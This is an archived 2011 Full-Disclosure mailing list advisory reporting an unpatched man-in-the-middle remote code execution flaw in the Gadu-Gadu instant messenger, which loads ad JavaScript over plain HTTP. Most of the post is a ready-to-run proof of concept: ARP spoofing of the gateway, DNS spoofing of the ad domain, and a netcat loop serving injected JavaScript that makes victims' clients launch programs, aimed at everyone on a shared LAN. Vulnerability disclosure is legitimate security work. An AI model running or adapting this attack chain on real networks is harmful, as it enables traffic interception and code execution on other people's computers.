lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <BANLkTi=T-AhaH1c2RdaFLsxQAGJjiDRJ5g@mail.gmail.com>
Date: Sat, 28 May 2011 14:45:58 +0200
From: Kacper Szczesniak <kacper@....pl>
To: full-disclosure@...ts.grok.org.uk
Subject: Gadu-Gadu 0-Day MITM, Remote Code Execution

Vendor: Gadu-Gadu (http://gadu-gadu.pl)
Vulnerable Version: All
Vulnerability Type: MITM, Remote Code Execution
Risk level: High
Credit: Kacper Szczesniak <kacper3.14@...il.com>
Vulnerability Details:

Gadu-Gadu is vulnerable to the Man-In-The-Middle attack allowing
remote code execution on a victim host.
JavaScript code is loaded from external HTTP location to display ads.
If an attacker is able to take over HTTP request it's possible to
inject JS code into WebKit User Interface. Internal communication
mechanisms can be used to spawn new processes. No user interaction or
contact list presence is needed as ads are loaded automatically.

a trivial PoC to spawn notepads all over CoffeeHeaven/LAN:

# echo 1 > /proc/sys/net/ipv4/ip_forward
# arp -s GW_IP GW_MAC
# arpspoof -i eth0 GW_IP
# echo "YOURIP *.adocean.pl" > /tmp/x
# dnsspoof -i eth0 -f /tmp/x
#  while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection:
close\r\nContent-Length: 239\r\nContent-Type:
text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a
id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click',
true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done


BTW last vulnerability was not really patched. Only message filter was
introduced so it's still possible to take advantage of it using
another MITM.

kacper

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ